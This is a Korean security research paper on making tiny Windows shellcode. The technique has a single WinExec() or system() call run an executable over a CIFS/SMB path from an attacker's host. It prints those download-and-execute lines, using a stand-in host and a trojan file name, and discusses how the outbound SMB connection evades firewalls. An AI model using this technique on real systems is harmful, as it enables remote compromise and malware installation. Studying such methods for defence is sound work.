Windows에서 Common Internet File System 기능을 이용하여 아주 작은 Shellcode 만들기

by Beist Security Research Group
(http://beist.org)

Abstract – 취약 프로그램을 공략할 때 Shellcode를 삽입할 공간이 부족할 경우를 대비해 많은 해커들이 작은 크기의 Shellcode를 만들기 위해 노력하고 있다. 본 문서는 Windows OS의 CIFS 기능을 이용하여 Shellcode를 만드는 방법론을 소개하고 있다. 결론적으로 Execute Function을 한번만 호출해도 해커가 원하는 기능을 수행할 수 있기 때문에 매우 간단하면서 크기가 작고 호환성이 좋은 Shellcode를 만들 수 있다.

1. INTRODUCTION

본 문서는 Windows OS에서 지원하는 CIFS(Common Internet File System) 기능을 이용하여 Shellcode를 만드는 방법에 대해서 설명한다. Shellcode 크기는 작을수록 사용하기 유리하다. 왜냐하면 취약한 프로그램을 공격할 때 프로그램에 따라 Shellcode가 들어갈 공간이 부족할 수도 있기 때문이다. 그래서 Shellcode는 최대한 작을수록 좋으며 이것이 많은 해커들이 Shellcode를 작게 만들려고 연구하는 이유이다.

CIFS는 NFS(Network File System)와 비슷한 개념이라 볼 수 있다. 인터넷으로 연결된 다른 컴퓨터의 자원을 쉽게 사용하기 위해 만들어진 프로토콜이다. CIFS를 이용하면 원격 컴퓨터에 있는 자원도 내 컴퓨터에 있는 것처럼 이용할 수 있다. 이 기능을 이용할 경우 기존에 알려진 방법들보다 훨씬 작게 Shellcode를 만들 수 있다.

2. PROPOSED METHOD

CIFS는 Windows OS를 사용하고 있는 PC가 다른 컴퓨터와 파일을 공유할 수 있는 방법을 제공하는 프로토콜이며 MS에서 개발하였다. NetBios를 통한 파일 공유를 예로 들 수 있다. CIFS는 SMB(Server Message Block)에서 이름만 바꾼 것이며 실제 모든 용도가 거의 같다고 볼 수 있다. 우리가 NetBios를 이용하여 다른 컴퓨터에 접근하는 것도 실제로는 SMB가 사용된다. 이 문서는 CIFS의 기능을 어떻게 Shellcode에 이용하는지에 초점을 맞추고 있기 때문에 CIFS프로토콜과 관련된 자세한 내용은 다루지 않겠다.

CIFS는 TCP/IP를 기반으로 작동하기 때문에 TCP/IP를 통해 인터넷에 연결되어 있는 컴퓨터라면 서로 다른 네트워크에 속해 있더라도 사용할 수 있다. 앞에서 언급했지만 CIFS의 주 목적은 자원을 공유하는 기능이다. 이 기능을 이용하여 어떻게 Shellcode를 작성할 수 있는지 알아보자.

Windows OS는 프로세스가 특정 파일에 접근할 때, 접근하려 하는 파일의 속성을 파악한다. 간단히 설명하자면 먼저 접근하려는 파일이 현재 컴퓨터 안에 존재하는 것이라면 일반적인 방식으로 처리한다. 그렇지 않고 만약 사용자가 원격에 있는 파일을 지정했다면 CIFS를 이용하여 처리한다. 이러한 과정을 copy.exe 명령어로 예를 들겠다.

경우 1) 먼저, 자신의 컴퓨터 안에 있는 자원을 처리할 경우이다.

C:\> copy.exe c:\test.txt c:\copy_test.txt

만약 c:\test.txt 파일이 존재한다면, c:\copy_test.txt에 복사될 것이다.

경우 2) CIFS로 처리되는 경우이다.

C:\> copy.exe \\REMOTE_COMPUTER\test\test.txt c:\copy.txt

경우2)는 경우1) 과 달리 첫 번째 파일 이름이 원격지의 컴퓨터를 지정하고 있다. 즉, 경우2) 명령은 NetBios를 이용하여 REMOTE_COMPUTER에 연결한 후, test directory에 존재하는 test.txt 파일을 자신의 컴퓨터의 c:\copy.txt에 복사하라는 의미이다. 만약 REMOTE_COMPUTER와 test directory, test.txt 파일에 접근할 권한이 있다면 명령은 성공적으로 실행될 것이다.

이제 Shellcode에 이용할 수 있는 방법을 알아보자. 경우2)에서 CIFS 사용이 가능했던 이유는 해당 기능이 Windows OS에서 자체적으로 지원해주는 것이기 때문이다. 즉, 이 기능은 Windows OS의 자체기능이기 때문에 활용 범위가 다양하다. 예를 들어 Shellcode에서도 가능하다. Shellcode에서 사용할만한 최적의 활용 방안은, 함수를 호출할 때 Argument로 CIFS를 이용한 원격지 파일 지정이다. 그 중에서 특히, 간단하면서도 효율적인 함수는 Execute 관련 함수들이다. 예를 들어 WinExec()나 system() 함수를 다음과 같이 요청할 수 있다.

WinExec("\\\\REMOTE_COMPUTER\\troy.exe ", 0);

system("\\\\REMOTE_COMPUTER\\troy.exe");

이 방법을 이용하면 아주 간단하게 Shellcode를 만들 수 있다. 이제 이 기법의 장점을 살펴보자.

- CIFS를 이용한 방법으로 구현할 수 있는 Shellcode 기능들은 기존에 나왔던 모든 Shellcode의 기능들을 포함하면서도 (심지어 큰 규모의 어플리케이션도 설치할 수 있다.) Shellcode의 크기가 매우 작다. 왜냐하면 실제 악성 행위를 하는 파일은 원격 컴퓨터에서 가져와 실행하기 때문이다. 이것의 효과는 ‘Download and Execute Shellcode’와 거의 유사하지만 Shellcode의 크기는 훨씬 작다.

- 요즘 컴퓨터는 공인 IP를 가지지 않았거나 Firewall을 이용하여 외부에서 내부로 오는 연결을 제한하는 경우도 많다. 그렇기 때문에 Shellcode는 최소한 Reverse Connect 기능을 갖추고 있어야 한다. 그렇지 않으면 공격을 성공하더라도 해당 컴퓨터를 완전하게 제어하지 못할 수도 있다. CIFS는 Reverse Connect처럼 Out going 연결을 하여 원격지에서 파일을 가져오기 때문에 보통의 경우 Firewall에 걸리지 않는다.

- 악성 파일을 받아오기 위해 사용할 원격 컴퓨터는 반드시 Windows 운영체제일 필요가 없다. like unix 계열 OS에서도 SMB 기능을 사용할 수 있기 때문이다.

- 단 하나의 함수만 사용해도 Shellcode 구현이 가능하기 때문에 구현이 간단하고 또한 그렇기 때문에 지금껏 공개된 다른 Shellcode 기법들보다 비교적 호환성이 좋다고 할 수 있다.

단점을 알아보자.

- 공격을 당한 시스템은 원격지에서 악성 파일을 가져와야 하기 때문에 해커 쪽에서 컴퓨터를 준비해놓고 있어야 한다. (Reverse Connect도 해커가 컴퓨터를 준비해놓고 있어야 한다.)

- 만약 Firewall이 Outgoing 연결까지 차단해놓았다면 이 방법은 통하지 않는다. (그러나 이렇게 설정하면 Firewall 안에 속해 있는 네트워크 사용자들은 매우 불편해지기 때문에 이럴 경우는 거의 없다고 보면 된다.)

- 마지막으로 본 기술의 매우 심각한 단점에 대해서 알리겠다. 사실 이 문서에서 다룬 기법 자체는 문제가 없다. 하지만 현재 서로 다른 네트워크에서 CIFS를 이용하기가 힘들다. 그 이유는 CIFS는 정상 작동을 위해 SMB Port를 사용하는데 SMB는 Worm 전파 등, 크래커들이 악용하는 서비스 중에 하나이다. 문제는, Worm 차단을 위해서 일반 사용자조차 CIFS를 사용 못하도록 ISP 단에서 CIFS 관련 네트워크 Port들을 막아버렸다. 대부분의 네트워크에서 Incoming하는 (혹은 Outgoing도 포함) CIFS 관련 Packet이 차단된다. 100% 완전히 차단된 것은 아니고 경험상 10개의 네트워크 중 1~2개의 네트워크에서는 CIFS 프로토콜 사용이 가능하였다. 만약 이 기법을 사용하기 위해서는 내부 네트워크에 있는 다른 호스트를(일반적으로 같은 네트워크 환경이라면 CIFS 사용을 허락한다.) 이용하거나 혹은 Incoming CIFS 관련 Packet을 차단하지 않는 네트워크에 속해 있는 호스트를 이용해야 한다.

3. CONCLUSION

CIFS를 이용하여 아주 작은 Shellcode를 만드는 방법을 알아보았다. Shellcode는 만드는 방식에 따라 크기가 달라질 수 있기 때문에 CIFS를 이용한 Shellcode나 다른 Shellcode의 크기를 직접적으로 언급하거나 비교하지 않았다. 그러나 본 문서에서 설명한 기법은 매우 간단한 방법이기 때문에 지금껏 공개된 Shellcode 중에서는 가장 작은 크기의 Shellcode가 될 것이라 생각한다.

본 문서는 Shellcode를 만드는 추상적인 방법론을 설명한 것이고, Shellcode의 크기를 줄일 수 있는 보다 구체적인 방법에 대해서 소개한 좋은 문서들이 이미 공개되어있다. References에 있는 문서를 참고하여 해당 방법들과 본 문서에서 제시한 방법을 결합한다면 보다 작은 크기의 Shellcode를 만들 수 있을 것으로 기대된다. 향후 연구 과제로 이 방법을 Kernel Level에서도 적용할 수 있는 방안과 CIFS처럼 원격에서 파일을 전송할 수 있는 보다 쉬운 기법에 대해서 고려하고 있다.

[References]

[1] Christopher Hertel, Implementing CIFS: The Common Internet File System, Prentice Hall (Book)

[2] WinExec API, MDSN URL - http://msdn.microsoft.com/library/en-us/dllproc/base/winexec.asp

[3] Dafydd Stuttard, Writing Small Shellcode, URL - http://www.ngssoftware.com/papers/WritingSmallShellcode.pdf

[4] Barnaby Jack, Remote Windows Kernel Exploitation – Step into the Ring0

URL - http://eeye.com/~data/publish/whitepapers/research/OT20050205.FILE.pdf

[5] Piotr Bania, NT shellcodes prevention demystified, URL –
http://phrack.org/phrack/63/p63-0x0f_NT_Shellcode_Prevention_Demystified.txt

[6] l0rd yup, Technological Step Into Win32 Shellcodes,

URL - http://www.astalavista.com/media/directory06/uploads/w32shellcodes.txt

[7] IA32 Manuals URL - http://developer.intel.com/design/Pentium4/documentation.htm